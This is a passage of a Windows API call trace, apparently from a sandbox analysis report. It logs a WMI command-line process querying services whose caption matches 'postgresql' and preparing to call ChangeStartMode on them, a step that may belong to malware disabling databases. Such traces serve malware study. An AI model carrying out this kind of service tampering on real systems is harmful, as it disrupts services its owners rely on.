pVal=0x20f550*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x20f550*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0118.663] IWbemClassObject:Get (in: This=0x2f6190, wszName="Server", lFlags=0, pVal=0x20f550*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x20f550*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0118.663] lstrlenW (lpString=".") returned 1 [0118.663] lstrlenW (lpString=".") returned 1 [0118.663] IWbemClassObject:Get (in: This=0x2f6190, wszName="Authority", lFlags=0, pVal=0x20f550*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2d6ac4, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x20f550*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0118.663] ??1CHString@@QAE@XZ () returned 0x74a66430 [0118.663] IUnknown:Release (This=0x2f6190) returned 0x1 [0118.663] GetCurrentThreadId () returned 0xfdc [0118.663] ??0CHString@@QAE@XZ () returned 0x20f55c [0118.663] IWbemClassObject:Get (in: This=0x2f5dd0, wszName="__RELPATH", lFlags=0, pVal=0x20f544*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x20f544*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"Service\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0118.663] GetCurrentThreadId () returned 0xfdc [0118.663] ??0CHString@@QAE@XZ () returned 0x20f4d8 [0118.663] ??0CHString@@QAE@PBG@Z () returned 0x20f4d4 [0118.664] ??0CHString@@QAE@ABV0@@Z () returned 0x20f454 [0118.664] ?Empty@CHString@@QAEXXZ () returned 0x74a66430 [0118.664] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x658b00 [0118.664] ?Find@CHString@@QBEHPBG@Z () returned 0x1b [0118.664] ?Left@CHString@@QBE?AV1@H@Z () returned 0x20f44c [0118.664] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0x20f450 [0118.664] ??YCHString@@QAEABV0@ABV0@@Z () returned 0x20f4d4 [0118.664] ??1CHString@@QAE@XZ () returned 0x1 [0118.664] ??1CHString@@QAE@XZ () returned 0x1 [0118.664] ?Mid@CHString@@QBE?AV1@H@Z () returned 0x20f448 [0118.664] ??4CHString@@QAEABV0@ABV0@@Z () returned 0x20f454 [0118.664] ??1CHString@@QAE@XZ () returned 0x1 [0118.664] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x658b60 [0118.664] ?Find@CHString@@QBEHPBG@Z () returned 0x7 [0118.664] ?Left@CHString@@QBE?AV1@H@Z () returned 0x20f44c [0118.664] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0x20f450 [0118.664] ??YCHString@@QAEABV0@ABV0@@Z () returned 0x20f4d4 [0118.664] ??1CHString@@QAE@XZ () returned 0x1 [0118.664] ??1CHString@@QAE@XZ () returned 0x1 [0118.664] ?Mid@CHString@@QBE?AV1@H@Z () returned 0x20f448 [0118.664] ??4CHString@@QAEABV0@ABV0@@Z () returned 0x20f454 [0118.664] ??1CHString@@QAE@XZ () returned 0x74a66430 [0118.664] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x74a66424 [0118.664] ??1CHString@@QAE@XZ () returned 0x74a66430 [0118.664] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0118.664] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0118.664] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0118.664] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"Service\\\"") returned 0x26 [0118.664] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Service\\\"") returned 0x79 [0118.665] SysStringLen (param_1="\"") returned 0x1 [0118.665] IWbemServices:GetObject (in: This=0x2d0ec8, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Service\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x20f4e4*=0x0, ppCallResult=0x0 | out: ppObject=0x20f4e4*=0x2f64e8, ppCallResult=0x0) returned 0x0 [0118.667] IWbemClassObject:Get (in: This=0x2f64e8, wszName="Text", lFlags=0, pVal=0x20f4b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x20f4b0*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2e0260*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x2d34f8, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0118.667] SafeArrayGetLBound (in: psa=0x2e0260, nDim=0x1, plLbound=0x20f4c0 | out: plLbound=0x20f4c0) returned 0x0 [0118.667] SafeArrayGetUBound (in: psa=0x2e0260, nDim=0x1, plUbound=0x20f4c4 | out: plUbound=0x20f4c4) returned 0x0 [0118.667] SafeArrayGetElement (in: psa=0x2e0260, rgIndices=0x20f4dc, pv=0x20f4c8 | out: pv=0x20f4c8) returned 0x0 [0118.667] SysStringLen (param_1="Service application management. ") returned 0x20 [0118.667] IUnknown:Release (This=0x2f64e8) returned 0x0 [0118.667] ??1CHString@@QAE@XZ () returned 0x1 [0118.667] ??1CHString@@QAE@XZ () returned 0x74a66430 [0118.667] ??1CHString@@QAE@XZ () returned 0x74a66430 [0118.667] lstrlenW (lpString="Service application management. ") returned 32 [0118.667] lstrlenW (lpString="Service application management. ") returned 32 [0118.667] IUnknown:Release (This=0x2f5dd0) returned 0x0 [0118.668] ??1CHString@@QAE@XZ () returned 0x74a66430 [0118.668] lstrlenW (lpString="PATH") returned 4 [0118.668] lstrlenW (lpString="WHERE") returned 5 [0118.668] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WHERE", cchCount1=5, lpString2="PATH", cchCount2=4) returned 3 [0118.668] lstrlenW (lpString="WHERE") returned 5 [0118.668] lstrlenW (lpString="WHERE") returned 5 [0118.668] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WHERE", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0118.668] lstrlenW (lpString="/") returned 1 [0118.668] lstrlenW (lpString="caption LIKE '%postgresql%'") returned 27 [0118.668] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="caption LIKE '%postgresql%'", cchCount1=27, lpString2="/", cchCount2=1) returned 3 [0118.668] lstrlenW (lpString="-") returned 1 [0118.668] lstrlenW (lpString="caption LIKE '%postgresql%'") returned 27 [0118.668] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="caption LIKE '%postgresql%'", cchCount1=27, lpString2="-", cchCount2=1) returned 3 [0118.668] lstrlenW (lpString="caption LIKE '%postgresql%'") returned 27 [0118.668] lstrlenW (lpString="caption LIKE '%postgresql%'") returned 27 [0118.668] lstrlenW (lpString="/") returned 1 [0118.668] lstrlenW (lpString="CALL") returned 4 [0118.668] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0118.668] lstrlenW (lpString="-") returned 1 [0118.668] lstrlenW (lpString="CALL") returned 4 [0118.668] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0118.668] lstrlenW (lpString="CALL") returned 4 [0118.668] lstrlenW (lpString="CALL") returned 4 [0118.668] lstrlenW (lpString="GET") returned 3 [0118.668] lstrlenW (lpString="CALL") returned 4 [0118.668] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0118.668] lstrlenW (lpString="LIST") returned 4 [0118.668] lstrlenW (lpString="CALL") returned 4 [0118.668] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0118.668] lstrlenW (lpString="SET") returned 3 [0118.668] lstrlenW (lpString="CALL") returned 4 [0118.668] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0118.668] lstrlenW (lpString="CREATE") returned 6 [0118.668] lstrlenW (lpString="CALL") returned 4 [0118.668] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0118.668] lstrlenW (lpString="CALL") returned 4 [0118.668] lstrlenW (lpString="CALL") returned 4 [0118.668] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0118.668] lstrlenW (lpString="/") returned 1 [0118.668] lstrlenW (lpString="ChangeStartMode") returned 15 [0118.668] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="/", cchCount2=1) returned 3 [0118.669] lstrlenW (lpString="-") returned 1 [0118.669] lstrlenW (lpString="ChangeStartMode") returned 15 [0118.669] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="-", cchCount2=1) returned 3 [0118.669] lstrlenW (lpString="ChangeStartMode") returned 15 [0118.669] lstrlenW (lpString="ChangeStartMode") returned 15 [0118.669] GetCurrentThreadId () returned 0xfdc [0118.669] ??0CHString@@QAE@XZ () returned 0x20ed64 [0118.669] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0118.669] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301478, cbMultiByte=-1, lpWideCharStr=0x658bb8, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0118.669] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0118.669] SysStringLen (param_1="SERVICE") returned 0x7 [0118.669] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='SERVICE") returned 0x23 [0118.669] SysStringLen (param_1="'") returned 0x1 [0118.669] IWbemServices:GetObject (in: This=0x2d0ab8, strObjectPath="MSFT_CliAlias.FriendlyName='SERVICE'", lFlags=0, pCtx=0x0, ppObject=0x20ed40*=0x0, ppCallResult=0x0 | out: ppObject=0x20ed40*=0x2f5dd0, ppCallResult=0x0) returned 0x0 [0118.676] lstrlenW (lpString="CALL") returned 4 [0118.676] lstrlenW (lpString="CALL") returned 4 [0118.676] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0118.676] IWbemClassObject:Get (in: This=0x2f5dd0, wszName="Verbs", lFlags=0, pVal=0x20ecf8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x20ecf8*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2dffc0*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0x2dfec0, rgsabound=((cElements=0xa, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0118.677] SafeArrayGetLBound (in: psa=0x2dffc0, nDim=0x1, plLbound=0x20ed08 | out: plLbound=0x20ed08) returned 0x0 [0118.677] SafeArrayGetUBound (in: psa=0x2dffc0, nDim=0x1, plUbound=0x20ed10 | out: plUbound=0x20ed10) returned 0x0 [0118.677] SafeArrayGetElement (in: psa=0x2dffc0, rgIndices=0x20ed18, pv=0x20ed4c | out: pv=0x20ed4c) returned 0x0 [0118.677] IWbemClassObject:Get (in: This=0x2f7710, wszName="Name", lFlags=0, pVal=0x20ece8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x20ece8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StartService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0118.677] lstrlenW (lpString="StartService") returned 12 [0118.677] lstrlenW (lpString="ChangeStartMode") returned 15 [0118.677] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="StartService", cchCount2=12) returned 1 [0118.677] IUnknown:Release (This=0x2f7710) returned 0x1 [0118.677] SafeArrayGetElement (in: psa=0x2dffc0, rgIndices=0x20ed18, pv=0x20ed4c | out: pv=0x20ed4c) returned 0x0 [0118.677] IWbemClassObject:Get (in: This=0x2f7c40, wszName="Name", lFlags=0, pVal=0x20ece8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StartService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x20ece8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StopService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0118.677] lstrlenW (lpString="StopService") returned 11 [0118.677] lstrlenW (lpString="ChangeStartMode") returned 15 [0118.677] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="StopService", cchCount2=11) returned 1 [0118.677] IUnknown:Release (This=0x2f7c40) returned 0x1 [0118.677] SafeArrayGetElement (in: psa=0x2dffc0, rgIndices=0x20ed18, pv=0x20ed4c | out: pv=0x20ed4c) returned 0x0 [0118.677] IWbemClassObject:Get (in: This=0x2f8180, wszName="Name", lFlags=0, pVal=0x20ece8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StopService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x20ece8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PauseService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0118.678] lstrlenW (lpString="PauseService") returned 12 [0118.678] lstrlenW (lpString="ChangeStartMode") returned 15 [0118.678] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="PauseService", cchCount2=12) returned 1 [0118.678] IUnknown:Release (This=0x2f8180) returned 0x1 [0118.678] SafeArrayGetElement (in: psa=0x2dffc0, rgIndices=0x20ed18, pv=0x20ed4c | out: pv=0x20ed4c) returned 0x0 [0118.678] IWbemClassObject:Get (in: This=0x2f86c0, wszName="Name", lFlags=0, pVal=0x20ece8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PauseService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x20ece8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ResumeService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0118.678] lstrlenW (lpString="ResumeService") returned 13 [0118.678] lstrlenW (lpString="ChangeStartMode") returned 15 [0118.678] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="ResumeService", cchCount2=13) returned 1 [0118.678] IUnknown:Release (This=0x2f86c0) returned 0x1 [0118.678] SafeArrayGetElement (in: psa=0x2dffc0, rgIndices=0x20ed18, pv=0x20ed4c | out: pv=0x20ed4c) returned 0x0 [0118.678] IWbemClassObject:Get (in: This=0x2f8c28, wszName="Name", lFlags=0, pVal=0x20ece8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ResumeService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x20ece8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="InterrogateService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0118.678] lstrlenW (lpString="InterrogateService") returned 18 [0118.678] lstrlenW (lpString="ChangeStartMode") returned 15 [0118.678] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="InterrogateService", cchCount2=18) returned 1 [0118.678] IUnknown:Release (This=0x2f8c28) returned 0x1 [0118.678] SafeArrayGetElement (in: psa=0x2dffc0, rgIndices=0x20ed18, pv=0x20ed4c | out: pv=0x20ed4c) returned 0x0 [0118.678] IWbemClassObject:Get (in: This=0x2f9630, wszName="Name", lFlags=0, pVal=0x20ece8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="InterrogateService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x20ece8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="UserControlService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0118.678] lstrlenW (lpString="UserControlService") returned 18 [0118.678] lstrlenW (lpString="ChangeStartMode") returned 15 [0118.678] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="UserControlService", cchCount2=18) returned 1 [0118.678] IUnknown:Release (This=0x2f9630) returned 0x1 [0118.678] SafeArrayGetElement (in: psa=0x2dffc0, rgIndices=0x20ed18, pv=0x20ed4c | out: pv=0x20ed4c) returned 0x0 [0118.678] IWbemClassObject:Get (in: This=0x2fd638, wszName="Name", lFlags=0, pVal=0x20ece8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="UserControlService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x20ece8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Create", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0118.678] lstrlenW (lpString="Create") returned 6 [0118.678] lstrlenW (lpString="ChangeStartMode") returned 15 [0118.679] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="Create", cchCount2=6) returned 1 [0118.679] IUnknown:Release (This=0x2fd638) returned 0x1 [0118.679] SafeArrayGetElement (in: psa=0x2dffc0, rgIndices=0x20ed18, pv=0x20ed4c | out: pv=0x20ed4c) returned 0x0 [0118.679] IWbemClassObject:Get (in: This=0x301308, wszName="Name", lFlags=0, pVal=0x20ece8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Create", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x20ece8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Change", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0118.679] lstrlenW (lpString="Change") returned 6 [0118.679] lstrlenW (lpString="ChangeStartMode") returned 15 [0118.679] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="Change", cchCount2=6) returned 3 [0118.679] IUnknown:Release (This=0x301308) returned 0x1 [0118.679] SafeArrayGetElement (in: psa=0x2dffc0, rgIndices=0x20ed18, pv=0x20ed4c | out: pv=0x20ed4c) returned 0x0 [0118.679] IWbemClassObject:Get (in: This=0x301f90, wszName="Name", lFlags=0, pVal=0x20ece8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Change", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x20ece8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ChangeStartMode", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0118.679] lstrlenW (lpString="ChangeStartMode") returned 15 [0118.679] lstrlenW (lpString="ChangeStartMode") returned 15 [0118.679] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="ChangeStartMode", cchCount2=15) returned 2 [0118.679] GetCurrentThreadId () returned 0xfdc [0118.679] ??0CHString@@QAE@XZ () returned 0x20eb64 [0118.679] IWbemClassObject:Get (in: This=0x301f90, wszName="Description", lFlags=0, pVal=0x20eb34*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x20eb34*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The ChangeStartMode method modifies the StartMode of a service. It returns an integer value of 0 if the service was successfully modified, 1 if the request is not supported, and any other number to indicate an error.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0118.679] ??1CHString@@QAE@XZ () returned 0x74a66430 [0118.679] IWbemClassObject:Get (in: This=0x301f90, wszName="Parameters", lFlags=0, pVal=0x20ecd8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x20ecd8*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2e0020*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0x2d33b8, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0118.680] IWbemClassObject:Get (in: This=0x301f90, wszName="VerbType", lFlags=0, pVal=0x20ec70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x20ec70*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0118.680] IWbemClassObject:Get (in: This=0x301f90, wszName="Derivation", lFlags=0, pVal=0x20ec58*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x20ec58*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ChangeStartMode", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0118.680] lstrlenW (lpString="ChangeStartMode") returned 15 [0118.680] lstrlenW (lpString="ChangeStartMode") returned 15 [0118.728] SafeArrayGetLBound (in: psa=0x2e0020, nDim=0x1, plLbound=0x20ed0c | out: plLbound=0x20ed0c) returned 0x0 [0118.728] SafeArrayGetUBound (in: psa=0x2e0020, nDim=0x1, plUbound=0x20ed28 | out: plUbound=0x20ed28) returned 0x0 [0118.728] SafeArrayGetElement (in: psa=0x2e0020, rgIndices=0x20ed2c, pv=0x20ed38 | out: pv=0x20ed38) returned 0x0 [0118.728] IWbemClassObject:Get (in: This=0x303028, wszName="ParaId", lFlags=0, pVal=0x20ec88*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x20ec88*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StartMode", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0118.728] IWbemClassObject:Get (in: This=0x303028, wszName="Type", lFlags=0, pVal=0x20ec20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x20ec20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="STRING", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0118.728] IWbemClassObject:Get (in: This=0x303028, wszName="Default", lFlags=0, pVal=0x20ec40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x20ec40*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0118.728] GetCurrentThreadId () returned 0xfdc [0118.728] ??0CHString@@QAE@XZ () returned 0x20eb74 [0118.728] IWbemClassObject:Get (in: This=0x303028, wszName="Qualifiers", lFlags=0, pVal=0x20eafc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x20eafc*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2e0230*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0x2d33d8, rgsabound=((cElements=0x2, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0118.728] SafeArrayGetLBound (in: psa=0x2e0230, nDim=0x1, plLbound=0x20eb2c | out: plLbound=0x20eb2c) returned 0x0 [0118.728] SafeArrayGetUBound (in: psa=0x2e0230, nDim=0x1, plUbound=0x20eb40 | out: plUbound=0x20eb40) returned 0x0 [0118.728] SafeArrayGetElement (in: psa=0x2e0230, rgIndices=0x20eb4c, pv=0x20eb6c | out: pv=0x20eb6c) returned 0x0 [0118.728] IWbemClassObject:Get (in: This=0x3032e0, wszName="Name", lFlags=0, pVal=0x20eb14*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x20eb14*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="In", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0118.728] IWbemClassObject:Get (in: This=0x3032e0, wszName="QualifierValue", lFlags=0, pVal=0x20eaec*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x20eaec*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2dfde0*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x2d33e8, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0118.728] SafeArrayGetLBound (in: psa=0x2dfde0, nDim=0x1, plLbound=0x20eb30 | out: plLbound=0x20eb30) returned 0x0 [0118.728] SafeArrayGetUBound (in: psa=0x2dfde0, nDim=0x1, plUbound=0x20eb10 | out: plUbound=0x20eb10) returned 0x0 [0118.728] lstrlenW (lpString="CIMTYPE") returned 7 [0118.728] lstrlenW (lpString="In") returned 2 [0118.728] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="CIMTYPE", cchCount2=7) returned 3 [0118.728] lstrlenW (lpString="read") returned 4 [0118.728] lstrlenW (lpString="In") returned 2 [0118.728] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="read", cchCount2=4) returned 1 [0118.728] lstrlenW (lpString="write") returned 5 [0118.728] lstrlenW (lpString="In") returned 2 [0118.728] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="write", cchCount2=5) returned 1 [0118.728] lstrlenW (lpString="In") returned 2 [0118.729] lstrlenW (lpString="In") returned 2 [0118.729] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="In", cchCount2=2) returned 2 [0118.729] SafeArrayGetElement (in: psa=0x2dfde0, rgIndices=0x20eb58, pv=0x20eb60 | out: pv=0x20eb60) returned 0x0 [0118.729] lstrlenW (lpString="true") returned 4 [0118.729] lstrlenW (lpString="True") returned 4 [0118.729] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="True", cchCount1=4, lpString2="true", cchCount2=4) returned 2 [0118.729] IUnknown:Release (This=0x3032e0) returned 0x1 [0118.729] SafeArrayGetElement (in: psa=0x2e0230, rgIndices=0x20eb4c, pv=0x20eb6c | out: pv=0x20eb6c) returned 0x0 [0118.729] IWbemClassObject:Get (in: This=0x303618, wszName="Name", lFlags=0, pVal=0x20eb14*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2d281c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x20eb14*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ValueMap", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0118.729] IWbemClassObject:Get (in: This=0x303618, wszName="QualifierValue", lFlags=0, pVal=0x20eaec*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2dfde0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x20eaec*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, 